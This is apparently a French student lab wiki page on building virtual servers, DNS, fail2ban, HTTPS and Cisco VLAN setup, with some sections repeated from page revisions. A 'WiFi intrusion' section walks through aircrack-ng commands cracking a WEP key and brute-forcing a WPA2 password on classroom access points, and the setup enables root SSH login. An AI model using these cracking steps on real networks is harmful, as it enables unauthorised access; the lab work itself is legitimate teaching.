</syntaxhighlight>Pour éviter un warning sur allowipv6 il faut décommenter les lignes suivantes dans <code>fail2ban.conf</code> (ligne 58 à 62)<syntaxhighlight>
Option: allowipv6
Notes.: Allows IPv6 interface:
Default: auto
Values: [ auto yes (on, true, 1) no (off, false, 0) ] Default: auto
allowipv6 = auto
</syntaxhighlight>

Enfin pour '''lancer le service''' il faut rentrer la commande suivante :
<syntaxhighlight lang="bash">
service fail2ban restart
</syntaxhighlight>

== HTTPS ==
Dans le dossier <code>/etc/apache2/sites-available</code>

On met la clef '''deadpool.tech.key''' et les certificats '''GandiCert.pem''' et '''deadpool.tech.crt''' (tout a été trouvé sur Gandi)<syntaxhighlight lang="bash">
<VirtualHost *:80>
ServerName deadpool.tech
ServerAlias www.deadpool.tech
Redirect permanent / https://deadpool.tech/
</VirtualHost>

<VirtualHost *:443>
ServerAdmin webmaster@localhost

DocumentRoot /var/www/html

ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined

SSLEngine on

SSLCertificateFile /etc/apache2/sites-available/deadpool.tech.crt
SSLCertificateKeyFile /etc/apache2/sites-available/deadpool.tech.key
SSLCertificateChainFile /etc/apache2/sites-available/GandiCert.pem

<FilesMatch "\.(?:cgi|shtml|phtml|php)$">
SSLOptions +StdEnvVars
</FilesMatch>
<Directory /usr/lib/cgi-bin>
SSLOptions +StdEnvVars
</Directory>

</VirtualHost>
</syntaxhighlight>
On entre ensuite les commande suivantes :<syntaxhighlight lang="bash">
a2enmod ssl
service apache restart
a2ensite default-ssl.conf
service apache2 reload
</syntaxhighlight>

== Effraction WIFI ==

=== Cassage de clef WEP d’un point d’accès WiFi ===
'''/!\''' Dans notre cas la carte réseau de notre zabeth ne fonctionnait plus (ce cas est courant).

Mr Redon nous a donc fournit une '''clé USB Wifi''' pour pouvoir travailler.

De plus les cracotte s'arrête au 13 donc je dois prendre la '''cracotte02'''.

La commande suivante permet de d''''identifier l'interface WIFI''' qui nous intéresse :<syntaxhighlight lang="bash">
ip link
</syntaxhighlight>Ici l'interface qui nous intéresse est wlx40a5efd21410. Donc nous pouvons lancer la commande suivante afin d'<nowiki/>'''identifier l'adresse IP de notre cracotte02'''.<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410
</syntaxhighlight>Dans la liste nous avons en effet la cracotte02 sur le channel 4 et l'adresse ip suivante :<syntaxhighlight lang="bash">
04:DA:D2:9C:50:51 -62 231 0 0 4 54e. WEP WEP cracotte02
</syntaxhighlight>Enfin nous pouvons '''lancer le cassage''' de la clé avec cette commande :<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410 --bssid 04:DA:D2:9C:50:51 -c4 --write log_airodump
</syntaxhighlight>Le nombre de la section DATA doit augmenter asser vite (sinon il y a un problème) :

Après un certain temps on peut entrer la commande suivante pour '''voir si la clé à été trouvée''' (le numéro, ici 5, dépend du nombre de fois ou la commande précédente a été lancé) :<syntaxhighlight lang="bash">
aircrack-ng log_airodump-05.cap
</syntaxhighlight>Le résultat suivant est le bon on a un '''KEY FOUND''' !!<syntaxhighlight lang="bash">
Aircrack-ng 1.7

[00:00:00] Tested 808 keys (got 54157 IVs)

KB depth byte(vote)
0 0/ 13 FF(75008) AF(66048) C6(65536) A6(62464) E3(61952) 20(61696) EC(61696) E8(61440) 13(61184) 30(61184) F3(61184) FD(60928) F1(60672) 27(60416) 41(60416) 5D(60416) 8D(60416)
1 0/ 1 01(81152) 78(64256) 13(63232) AC(63232) E6(62720) 48(61952) 91(61952) 92(61696) AB(61696) 74(61440) 56(61184) A8(61184) 4A(60928) C9(60928) 17(60672) 35(60416) F2(60416)
2 9/ 2 D2(60416) D5(60160) DF(60160) 44(59904) 7A(59904) 99(59904) AD(59904) 15(59648) 2A(59648) 31(59648) 67(59648) E6(59648) 0D(59392) 16(59392) 7E(59392) DC(59392) 5B(59136)
3 0/ 1 08(79360) 1D(63744) 7D(61952) 1B(61184) CB(60928) A3(60672) 85(60160) 58(59904) AC(59904) 11(59648) 53(59648) 9C(59648) EA(59648) 81(59392) 84(59392) AA(59392) B1(59392)
4 8/ 4 9A(61440) 22(61184) DB(61184) D7(60928) 48(60672) 88(60672) 36(60416) 14(59904) 57(59904) 5C(59904) 8D(59904) CF(59904) 04(59136) 20(58880) 39(58880) B4(58880) D5(58880)

KEY FOUND! [ FF:FF:FF:FF:FA:BC:03:CB:AE:EE:EE:EE:EE ]
Decrypted correctly: 100%
</syntaxhighlight>

=== Cassage de mot de passe WPA-PSK par force brute ===
On s'intéresse maintenant à la '''kracotte02''' (information trouvable par la commande de la section précédente) :<syntaxhighlight lang="bash">
44:AD:D9:5F:87:01 -47 5 0 0 13 54e. WPA2 CCMP PSK kracotte02
</syntaxhighlight>

Pour forcer ce mot de passe par force brut nous créons via un '''fichier Python''' un dictionnaire contenant '''toutes les possibilités sur 8 chiffres'''. Le contenu de ce fichier est le suivant :<syntaxhighlight lang="python3">
with open("dictionnaire_8_chiffres.txt", "w") as f:
for i in range(100000000):
f.write(f"{i:08d}\n")
</syntaxhighlight>
Lancer ce programme afin de créer le fichier dictionnaire_8_chiffres.txt.

La commande suivante est nécessaire pour que aircrack-ng utilise notre dictionnaire :<syntaxhighlight lang="bash">
sudo aircrack-ng -w dictionnaire_8_chiffres.txt -b 44:AD:D9:5F:87:01
</syntaxhighlight>Nous pouvons enfin '''lancer le cassage du mot de passe''' par force brute via cette commande :<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410 --write airodumpWPA --bssid 44:AD:D9:5F:87:01 -c13
</syntaxhighlight>La commande ci-dessous permet de '''savoir si le mot de passe à été trouvé''' (/!\ cela peut prendre du temps selon la valeur de la clé, dans notre cas plus de 30min) :<syntaxhighlight lang="bash">
sudo aircrack-ng -w dictionnaire_8_chiffres.txt -b 44:AD:D9:5F:87:01 airodumpWPA-03.cap
</syntaxhighlight>Nous avons le bon résultat un nouveau '''KEY FOUND''' !!<syntaxhighlight lang="bash">

Aircrack-ng 1.7

[00:37:28] 66655552/100000000 keys tested (29360.85 k/s)

Time left: 18 minutes, 55 seconds 66.66%

KEY FOUND! [ 66688666 ]

Master Key : A4 3E 9E 85 7D D3 4E 0C 2C D4 D9 1C 4F 08 1A 0C
B4 BA B2 64 8C 24 38 C5 DD 27 81 8E CE 2C F4 CA

Transient Key : AA 75 80 E5 F3 77 C2 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

EAPOL HMAC : 97 42 1A DB B7 EE FB 19 C3 7C EA 9E 29 99 0A 4B
</syntaxhighlight>

== Vlan ==

Depuis la machine batman on se ssh sur le routeur<syntaxhighlight lang="bash">
ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.1
</syntaxhighlight>

Entrez ensuite les commandes suivantes pour le dhcp :<syntaxhighlight lang="bash">
C9200-E304>en
C9200-E304>configure
C9200-E304(config)#ip dhcp pool PoolAntonin
C9200-E304(dhcp-config)#network 10.60.14.0 255.255.255.0
C9200-E304(dhcp-config)#dns-server 193.48.57.169
C9200-E304(dhcp-config)#default-router 10.60.14.254
C9200-E304(dhcp-config)#exit
C9200-E304(config)#exit
C9200-E304>write

</syntaxhighlight>Enfin pour vérifier les commandes ont données ce que l'on souhaite<syntaxhighlight lang="bash">
C9200-E304#show running-config
</syntaxhighlight>

Création du Vlan24<syntaxhighlight lang="bash">
C9200-E304>en
C9200-E304>configure
C9200-E304(config)#Vlan 24
C9200-E304(vlan-config)#name PoolAntonin
C9200-E304(vlan-config)#exit
C9200-E304(config)#exit
C9200-E304>write

</syntaxhighlight>

Pour VRRP on peut entrer les commandes suivantes<syntaxhighlight lang="bash">
C9200-E304(config)#interface Vlan24
C9200-E304(config-if)#ip address 10.60.14.2 255.255.255.0
C9200-E304(config-if)#ipv6 address 2001:660:4401:60ae::2/64
C9200-E304(config-if)#vrrp 24 address-family ipv4
C9200-E304(config-if-vrrp)#priority 110
C9200-E304(config-if-vrrp)#address 10.60.14.1 primary
C9200-E304(config-if-vrrp)#exit-vrrp
C9200-E304(config-if)#end
</syntaxhighlight>

Pour se ssh sur le wifi<syntaxhighlight lang="bash">
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.4
</syntaxhighlight>
On entre ensuite ces commandes :<syntaxhighlight lang="bash">
conf t

aaa new-model
aaa authentication login eap_student14 group radius_student14
radius-server host 192.168.69.3 auth-port 1812 acct-port 1813 key secret_student14
aaa group server radius radius_student14
server 192.168.69.3 auth-port 1812 acct-port 1813
exit

dot11 ssid VM_SERVICES_14
vlan 24
authentication open eap eap_student14
authentication network-eap eap_student14
authentication key-management wpa
mbssid guest-mode
exit

interface Dot11Radio0
encryption vlan 24 mode ciphers aes-ccm
exit

interface Dot11Radio0.24
encapsulation dot1Q 24
bridge-group 24
exit

interface GigabitEthernet0.24
encapsulation dot1Q 24
bridge-group 24
exit

interface Dot11Radio0
ssid VM_SERVICES_14
exit
</syntaxhighlight>

2001:660:4401:60a0:216:3eff:fe19:f03c

Atelier SysRes SE4 2025/2026 E14

2026-02-15T11:31:53Z

Abiernac :

'''BIERNACKI Antonin'''

IOT 4

2025-2026

== Infos concernant notre binôme ==
Binôme : '''CHEKLAT Billel''' [[Atelier SysRes SE4 2025/2026 E13]]

Mandataire : '''superman'''

IP publique de la mandataire : '''193.48.57.169'''

Service 1 (Antonin) : '''batman'''

Nom de domaine 1 (Antonin) : '''deadpool.tech'''

Nom service 2 (Billel) : '''catwoman'''

Nom de domaine 1 (Billel) : '''dardevil.tech''' (le e manquant dans daredevil est une pure volonté du binôme et un choix pratique et judicieux pour ce TP ;) )

Bridge : '''pont_ironman'''

Réseau IPv4 : '''192.168.69.0/24'''

== Introduction ==

== Création du bridge ==
<syntaxhighlight lang="bash">
auto pont_ironman
iface pont_ironman inet manual
bridge_ports none
up ip link set $IFACE up
down ip link set $IFACE down
</syntaxhighlight><syntaxhighlight lang="bash">
ifup pont_ironman
</syntaxhighlight>

== Création des machines virtuelles ==
Nous avons '''créé nos trois machines''' sur le serveur capbreton via les commandes suivantes (nous avons mit la version excalibur de devuan sur la mandataire pour essayer) :<syntaxhighlight lang="bash">
root@capbreton:~# xen-create-image --hostname=SE4.batman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2G
root@capbreton:~# xen-create-image --hostname=SE4.catwoman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2G
root@capbreton:~# xen-create-image --hostname=SE4.superman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=excalibur --memory=2G
</syntaxhighlight>Ces commandes vous donnent un tableau récapitulatif avec un le '''root password''' qu'il faut noter pour pouvoir vous connecter (ce mdp est retrouvable dans le .cfg de la machine). Si vous souhaitez changer le mdp de votre machine, veiller à mettre un mdp '''robuste''' car cette machine sera sur internet.

xen create permet de '''démarrer les machines''' avec leur fichiers de configuration :<syntaxhighlight lang="bash">
xen create /etc/xen/SE4.batman.cfg
xen create /etc/xen/SE4.catwoman.cfg
xen create /etc/xen/SE4.superman.cfg
</syntaxhighlight>xen console permet d'<nowiki/>'''accéder à la console de la machine virtuelle''' (pour quitter la console un exit suffit et pour quitter la saisie de connection '''Ctrl + Shift + 5''') :<syntaxhighlight lang="bash">
xen console SE4.batman
xen console SE4.catwoman
xen console SE4.superman
</syntaxhighlight>

== Configuration de la machine de services ==

=== Montage des partitions /home et /var ===

==== Sur capbreton ====

Pour '''créer les partitions''' /home et /var on entre les deux commandes suivantes dans <code>/dev/virtual</code> de capbreton :<syntaxhighlight lang="bash">
lvcreate -n SE4.batman.home -L 10G virtual
lvcreate -n SE4.batman.var -L 10G virtual

</syntaxhighlight>Ensuite on vient ajouter les lignes suivante dans <code>/etc/xen/batman.cfg</code> :<syntaxhighlight lang="bash">
disk = [
'file:/usr/local/xen/domains/SE4.batman/disk.img,xvda2,w',
'file:/usr/local/xen/domains/SE4.batman/swap.img,xvda1,w',
'phy:/dev/virtual/SE4.batman.home,xvdb,w',
'phy:/dev/virtual/SE4.batman.var,xvdc,w',
]
</syntaxhighlight>

==== Sur la machine de service ====

Pour '''formater et monter''' les partitions nous utilisons les commandes suivantes ('''/!\ pas dans capbreton''') :<syntaxhighlight>
mkfs -t ext4 /dev/xvdb
mkfs -t ext4 /dev/xvdc
mount /dev/xvdb /mnt
mv /var/* /mnt
umount /mnt
mount -a

</syntaxhighlight>Ajouter ces lignes dans <code>/etc/fstab</code> afin que les partitions soient '''montées de façon automatiques''' au démarrage de la VM :<syntaxhighlight lang="bash">
/dev/xvdb /var ext4 defaults 0 2
/dev/xvdc /home ext4 defaults 0 2
</syntaxhighlight>Enfin vous pouvez '''redémarrer''' la VM sur capbreton : <syntaxhighlight lang="bash">
xen shutdown SE4.batman
xen create /etc/xen/SE4.batman.cfg
</syntaxhighlight>

=== Configuration réseau ===
On modifie le fichier <code>/etc/network/interfaces</code> comme suivant :<syntaxhighlight lang="bash">
auto lo
iface lo inet loopback

# IPv4
auto eth0
iface eth0 inet static
address 192.168.69.2/24 IPv4 de batman (service)
gateway 192.168.69.1 IPv4 de superman (mandataire)

# IPv6
auto eth1
iface eth1 inet6 auto
</syntaxhighlight>

== Configuration de la machine mandataire ==
On modifie le fichier <code>/etc/network/interfaces</code> comme suivant :<syntaxhighlight lang="bash">
auto lo
iface lo inet loopback

# IPv4
auto eth0
iface eth0 inet static
address 192.168.69.1/24 # IPv4 de superman (mandataire)

auto eth1
iface eth1 inet static
address 193.48.57.169/27 # IPv4 publique de superman
gateway 193.48.57.162

</syntaxhighlight>On modifie le fichier <code>/etc/xen/SE4.batman.cfg</code> sur capbreton<syntaxhighlight lang="bash">
vif = [ 'mac=00:16:3E:FA:18:CF,bridge=pont_ironman', 'mac=00:16:3E:FA:18:D0,bridge=SE4' ]
</syntaxhighlight>Une fois cela fait on peut '''redémarrer''' la VM avec les commandes précédentes. Ensuite sur batman on doit lancer l'interface :<syntaxhighlight lang="bash">
reboot
ifdown eth1; ifup eth1
</syntaxhighlight>
== Configuration SSH et Mascarade ==
Ces commandes permettent de '''synchroniser l'heure''' du système :<syntaxhighlight lang="bash">
apt update
apt install ntp ntpdate host
apt install ntpsec ntpsec-ntpdate host
date
</syntaxhighlight>
La mascarade se configure avec '''iptables''', et consiste à donne une adresse IPv4 qui permet d'accéder à internet. <syntaxhighlight lang="bash">
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.69.0/24
iptables-save

</syntaxhighlight>Dans les '''trois VMs''' on modifie <code>/etc/ssh/sshd_config</code> en ajoutant :
PermitRootLogin yes
On peut ensuite '''redémarrer''' le service ssh :
/etc/init.d/ssh restart
La '''redirection du port ssh''' ce fait via les commandes suivantes sur la machine mandataire :<syntaxhighlight lang="bash">
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.69.2:22
iptables -t nat -A PREROUTING -p tcp --dport 2203 -j DNAT --to-destination 192.168.69.3:22
iptables-save

</syntaxhighlight>Dans le fichier <code>/etc/sysctl.conf</code> la ligne suivante doit être '''décommentée''' :<syntaxhighlight lang="bash">
net.ipv4.ip_forward=1
</syntaxhighlight>Nous avons aussi installer <code>iptables-persistent</code> pour éviter de perdre la configuration à chaque reboot.<syntaxhighlight lang="bash">
apt install iptables-persistant
</syntaxhighlight>Désormais le ssh peut être fait via les commandes suivantes :<syntaxhighlight lang="bash">
# ssh en IPV4
ssh root@<add_ipv4> -p 2202
# ssh en IPV6
ssh root@<add_ipv6>
</syntaxhighlight>

== DNS ==
On modifie le fichier <code>/etc/bind/named.conf.local</code> afin de fait passer par notre DNS et d'avoir le second DNS en backup :<syntaxhighlight lang="bash">
dnssec-policy "dnspol" {
keys {
ksk key-directory lifetime unlimited algorithm 13;
zsk key-directory lifetime unlimited algorithm 13;
};
nsec3param;
};

zone "deadpool.tech" {
type master;
file "/etc/bind/db.deadpool.tech";
allow-transfer{secondaries;};
notify yes;
key-directory "/etc/bind/keys";
dnssec-policy "dnspol";
inline-signing yes;
};

acl "secondaries" {
192.168.69.3;
2001:660:4401:60a0:216:3eff:fe8f:4743;
};

zone "dardevil.tech" {
type secondary;
file "/etc/bind/backup/db.dardevil.tech";
masters{2001:660:4401:60a0:216:3eff:fe8f:4743;};
};
</syntaxhighlight>Création d'un dossier zones dans <code>/etc/bind</code> et y créer le fichier <code>db.deadpool.tech</code><syntaxhighlight lang="bash">
$TTL 400

@ IN SOA ns.deadpool.tech. admin.deadpool.tech. (
3609 ; Version
21600 ; Refresh
3600 ; Retry
2592000 ; Expire
86400 ; Minimum TTL

);

@ IN NS ns.dardevil.tech.
@ IN NS ns.deadpool.tech.

ns IN A 193.48.57.169
ns IN AAAA 2001:660:4401:60a0:216:3eff:fe8f:4743
@ IN A 193.48.57.169
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe8f:4743

www IN CNAME deadpool.tech.
</syntaxhighlight>
Modification du fichier <code>/etc/resolv.conf</code> (il faut '''commenter''' tous les autres servers)<syntaxhighlight lang="bash">
search deadpool.tech
search dardevil.tech
nameserver 192.168.69.2
nameserver 192.168.69.3
</syntaxhighlight>Creation d'un repertoire keys avec les droits nécessaires :<syntaxhighlight lang="bash">
mkdir /etc/bind/keys
chown bind:bind /etc/bind/keys
chmod 750 /etc/bind/keys
</syntaxhighlight>

Pour '''restart''' le service<syntaxhighlight lang="bash">
service named restart
</syntaxhighlight>

Génération de la clé pour le certificat sur batman<syntaxhighlight lang="bash">
openssl req -nodes -newkey rsa:2048 -sha256 -keyout deadpool.tech.key -out ddeadpool.csr

Country Name (2 letter code) [AU]:FR
State or Province Name (full name) [Some-State]:Nord
Locality Name (eg, city) []:Lille
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille
Organizational Unit Name (eg, section) []:IOT
Common Name (e.g. server FQDN or YOUR name) []:deadpool.tech
Email Address []:antonin.biernacki@polytech-lille.net
</syntaxhighlight>Sur catwoman<syntaxhighlight lang="shell">
openssl req -nodes -newkey rsa:2048 -sha256 -keyout dardevil.tech.key -out dardevil.csr

Country Name (2 letter code) [AU]:FR
State or Province Name (full name) [Some-State]:Nord
Locality Name (eg, city) []:Lille
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille
Organizational Unit Name (eg, section) []:IOT
Common Name (e.g. server FQDN or YOUR name) []:dardevil.tech
Email Address []:billel.cheklat@polytech-lille.net
</syntaxhighlight>

Si il y a des erreurs la commande suivante permet de les identifier<syntaxhighlight lang="bash">
named-checkconf /etc/bind/named.conf
</syntaxhighlight>Pour tester le DNS depuis la machine de service<syntaxhighlight lang="bash">
dig @localhost deadpool.tech
</syntaxhighlight>Modification sur Gandi au niveau des deux noms de domaine

Création d'un blue record pour chacun des noms de domaine<syntaxhighlight>
ns.deadpool.tech
193.48.57.169 // adresse IPv4 de la mandataire
2001:660:4401:60a0:216:3eff:fefa:18d0 // adresse IPv6 de la machine de service
</syntaxhighlight>Ajout de external nameserver pour chacun des deux noms de domaine<syntaxhighlight>
ns.deadpool.tech // nom de domaine
ns.dardevil.tech // l'autre nom de domaine
</syntaxhighlight>Pour tester depuis l'extérieur<syntaxhighlight lang="bash">
dig deadpool.tech
</syntaxhighlight>

== Fail2ban ==
Il faut commencer par installer fail2ban

Ensuite il faut créer un fichier <code>jail.local</code> dans le dossier <code>/etc/fail2ban</code>
<syntaxhighlight>
[sshd]
enable = true
port = ssh
filter = sshd
maxretry = 5
findtime = 300
bantime = 600
</syntaxhighlight>Pour éviter un warning sur allowipv6 il faut décommenter les lignes suivantes dans <code>fail2ban.conf</code> (ligne 58 à 62)<syntaxhighlight>
Option: allowipv6
Notes.: Allows IPv6 interface:
Default: auto
Values: [ auto yes (on, true, 1) no (off, false, 0) ] Default: auto
allowipv6 = auto
</syntaxhighlight>

Enfin pour '''lancer le service''' il faut rentrer la commande suivante :
<syntaxhighlight lang="bash">
service fail2ban restart
</syntaxhighlight>

== HTTPS ==
Dans le dossier <code>/etc/apache2/sites-available</code>

On met la clef '''deadpool.tech.key''' et les certificats '''GandiCert.pem''' et '''deadpool.tech.crt''' (tout a été trouvé sur Gandi)<syntaxhighlight lang="bash">
<VirtualHost *:80>
ServerName deadpool.tech
ServerAlias www.deadpool.tech
Redirect permanent / https://deadpool.tech/
</VirtualHost>

<VirtualHost *:443>
ServerAdmin webmaster@localhost

DocumentRoot /var/www/html

ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined

SSLEngine on

SSLCertificateFile /etc/apache2/sites-available/deadpool.tech.crt
SSLCertificateKeyFile /etc/apache2/sites-available/deadpool.tech.key
SSLCertificateChainFile /etc/apache2/sites-available/GandiCert.pem

<FilesMatch "\.(?:cgi|shtml|phtml|php)$">
SSLOptions +StdEnvVars
</FilesMatch>
<Directory /usr/lib/cgi-bin>
SSLOptions +StdEnvVars
</Directory>

</VirtualHost>
</syntaxhighlight>
On entre ensuite les commande suivantes :<syntaxhighlight lang="bash">
a2enmod ssl
service apache restart
a2ensite default-ssl.conf
service apache2 reload
</syntaxhighlight>

== Effraction WIFI ==

=== Cassage de clef WEP d’un point d’accès WiFi ===
'''/!\''' Dans notre cas la carte réseau de notre zabeth ne fonctionnait plus (ce cas est courant).

Mr Redon nous a donc fournit une '''clé USB Wifi''' pour pouvoir travailler.

De plus les cracotte s'arrête au 13 donc je dois prendre la '''cracotte02'''.

La commande suivante permet de d''''identifier l'interface WIFI''' qui nous intéresse :<syntaxhighlight lang="bash">
ip link
</syntaxhighlight>Ici l'interface qui nous intéresse est wlx40a5efd21410. Donc nous pouvons lancer la commande suivante afin d'<nowiki/>'''identifier l'adresse IP de notre cracotte02'''.<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410
</syntaxhighlight>Dans la liste nous avons en effet la cracotte02 sur le channel 4 et l'adresse ip suivante :<syntaxhighlight lang="bash">
04:DA:D2:9C:50:51 -62 231 0 0 4 54e. WEP WEP cracotte02
</syntaxhighlight>Enfin nous pouvons '''lancer le cassage''' de la clé avec cette commande :<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410 --bssid 04:DA:D2:9C:50:51 -c4 --write log_airodump
</syntaxhighlight>Le nombre de la section DATA doit augmenter asser vite (sinon il y a un problème) :

Après un certain temps on peut entrer la commande suivante pour '''voir si la clé à été trouvée''' (le numéro, ici 5, dépend du nombre de fois ou la commande précédente a été lancé) :<syntaxhighlight lang="bash">
aircrack-ng log_airodump-05.cap
</syntaxhighlight>Le résultat suivant est le bon on a un '''KEY FOUND''' !!<syntaxhighlight lang="bash">
Aircrack-ng 1.7

[00:00:00] Tested 808 keys (got 54157 IVs)

KB depth byte(vote)
0 0/ 13 FF(75008) AF(66048) C6(65536) A6(62464) E3(61952) 20(61696) EC(61696) E8(61440) 13(61184) 30(61184) F3(61184) FD(60928) F1(60672) 27(60416) 41(60416) 5D(60416) 8D(60416)
1 0/ 1 01(81152) 78(64256) 13(63232) AC(63232) E6(62720) 48(61952) 91(61952) 92(61696) AB(61696) 74(61440) 56(61184) A8(61184) 4A(60928) C9(60928) 17(60672) 35(60416) F2(60416)
2 9/ 2 D2(60416) D5(60160) DF(60160) 44(59904) 7A(59904) 99(59904) AD(59904) 15(59648) 2A(59648) 31(59648) 67(59648) E6(59648) 0D(59392) 16(59392) 7E(59392) DC(59392) 5B(59136)
3 0/ 1 08(79360) 1D(63744) 7D(61952) 1B(61184) CB(60928) A3(60672) 85(60160) 58(59904) AC(59904) 11(59648) 53(59648) 9C(59648) EA(59648) 81(59392) 84(59392) AA(59392) B1(59392)
4 8/ 4 9A(61440) 22(61184) DB(61184) D7(60928) 48(60672) 88(60672) 36(60416) 14(59904) 57(59904) 5C(59904) 8D(59904) CF(59904) 04(59136) 20(58880) 39(58880) B4(58880) D5(58880)

KEY FOUND! [ FF:FF:FF:FF:FA:BC:03:CB:AE:EE:EE:EE:EE ]
Decrypted correctly: 100%
</syntaxhighlight>

=== Cassage de mot de passe WPA-PSK par force brute ===
On s'intéresse maintenant à la '''kracotte02''' (information trouvable par la commande de la section précédente) :<syntaxhighlight lang="bash">
44:AD:D9:5F:87:01 -47 5 0 0 13 54e. WPA2 CCMP PSK kracotte02
</syntaxhighlight>

Pour forcer ce mot de passe par force brut nous créons via un '''fichier Python''' un dictionnaire contenant '''toutes les possibilités sur 8 chiffres'''. Le contenu de ce fichier est le suivant :<syntaxhighlight lang="python3">
with open("dictionnaire_8_chiffres.txt", "w") as f:
for i in range(100000000):
f.write(f"{i:08d}\n")
</syntaxhighlight>
Lancer ce programme afin de créer le fichier dictionnaire_8_chiffres.txt.

La commande suivante est nécessaire pour que aircrack-ng utilise notre dictionnaire :<syntaxhighlight lang="bash">
sudo aircrack-ng -w dictionnaire_8_chiffres.txt -b 44:AD:D9:5F:87:01
</syntaxhighlight>Nous pouvons enfin '''lancer le cassage du mot de passe''' par force brute via cette commande :<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410 --write airodumpWPA --bssid 44:AD:D9:5F:87:01 -c13
</syntaxhighlight>La commande ci-dessous permet de '''savoir si le mot de passe à été trouvé''' (/!\ cela peut prendre du temps selon la valeur de la clé, dans notre cas plus de 30min) :<syntaxhighlight lang="bash">
sudo aircrack-ng -w dictionnaire_8_chiffres.txt -b 44:AD:D9:5F:87:01 airodumpWPA-03.cap
</syntaxhighlight>Nous avons le bon résultat un nouveau '''KEY FOUND''' !!<syntaxhighlight lang="bash">

Aircrack-ng 1.7

[00:37:28] 66655552/100000000 keys tested (29360.85 k/s)

Time left: 18 minutes, 55 seconds 66.66%

KEY FOUND! [ 66688666 ]

Master Key : A4 3E 9E 85 7D D3 4E 0C 2C D4 D9 1C 4F 08 1A 0C
B4 BA B2 64 8C 24 38 C5 DD 27 81 8E CE 2C F4 CA

Transient Key : AA 75 80 E5 F3 77 C2 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

EAPOL HMAC : 97 42 1A DB B7 EE FB 19 C3 7C EA 9E 29 99 0A 4B
</syntaxhighlight>

=== Vlan ===
Depuis la machine batman on se ssh sur le routeur<syntaxhighlight lang="bash">
ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.1
</syntaxhighlight>

Entrez ensuite les commandes suivantes pour le dhcp :<syntaxhighlight lang="bash">
C9200-E304>en
C9200-E304>configure
C9200-E304(config)#ip dhcp pool PoolAntonin
C9200-E304(dhcp-config)#network 10.60.14.0 255.255.255.0
C9200-E304(dhcp-config)#dns-server 193.48.57.169
C9200-E304(dhcp-config)#default-router 10.60.14.254
C9200-E304(dhcp-config)#exit
C9200-E304(config)#exit
C9200-E304>write

</syntaxhighlight>Enfin pour vérifier les commandes ont données ce que l'on souhaite<syntaxhighlight lang="bash">
C9200-E304#show running-config
</syntaxhighlight>

Création du Vlan24<syntaxhighlight lang="bash">
C9200-E304>en
C9200-E304>configure
C9200-E304(config)#Vlan 24
C9200-E304(vlan-config)#name PoolAntonin
C9200-E304(vlan-config)#exit
C9200-E304(config)#exit
C9200-E304>write

</syntaxhighlight>

Pour VRRP on peut entrer les commandes suivantes<syntaxhighlight lang="bash">
C9200-E304(config)#interface Vlan24
C9200-E304(config-if)#ip address 10.60.14.2 255.255.255.0
C9200-E304(config-if)#ipv6 address 2001:660:4401:60ae::2/64
C9200-E304(config-if)#vrrp 24 address-family ipv4
C9200-E304(config-if-vrrp)#priority 110
C9200-E304(config-if-vrrp)#address 10.60.14.1 primary
C9200-E304(config-if-vrrp)#exit-vrrp
C9200-E304(config-if)#end
</syntaxhighlight>

Pour se ssh sur le wifi<syntaxhighlight lang="bash">
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.4
</syntaxhighlight>
On entre ensuite ces commandes :<syntaxhighlight lang="bash">
conf t

aaa new-model
aaa authentication login eap_student14 group radius_student14
radius-server host 192.168.69.3 auth-port 1812 acct-port 1813 key secret_student14
aaa group server radius radius_student14
server 192.168.69.3 auth-port 1812 acct-port 1813
exit

dot11 ssid VM_SERVICES_14
vlan 24
authentication open eap eap_student14
authentication network-eap eap_student14
authentication key-management wpa
mbssid guest-mode
exit

interface Dot11Radio0
encryption vlan 24 mode ciphers aes-ccm
exit

interface Dot11Radio0.24
encapsulation dot1Q 24
bridge-group 24
exit

interface GigabitEthernet0.24
encapsulation dot1Q 24
bridge-group 24
exit

interface Dot11Radio0
ssid VM_SERVICES_14
exit
</syntaxhighlight>

2001:660:4401:60a0:216:3eff:fe19:f03c

Atelier SysRes SE4 2025/2026 E14

2026-02-15T11:18:12Z

Abiernac :

'''BIERNACKI Antonin'''

IOT 4

2025-2026

== Infos concernant notre binôme ==
Binôme : '''CHEKLAT Billel''' [[Atelier SysRes SE4 2025/2026 E13]]

Mandataire : '''superman'''

IP publique de la mandataire : '''193.48.57.169'''

Service 1 (Antonin) : '''batman'''

Nom de domaine 1 (Antonin) : '''deadpool.tech'''

Nom service 2 (Billel) : '''catwoman'''

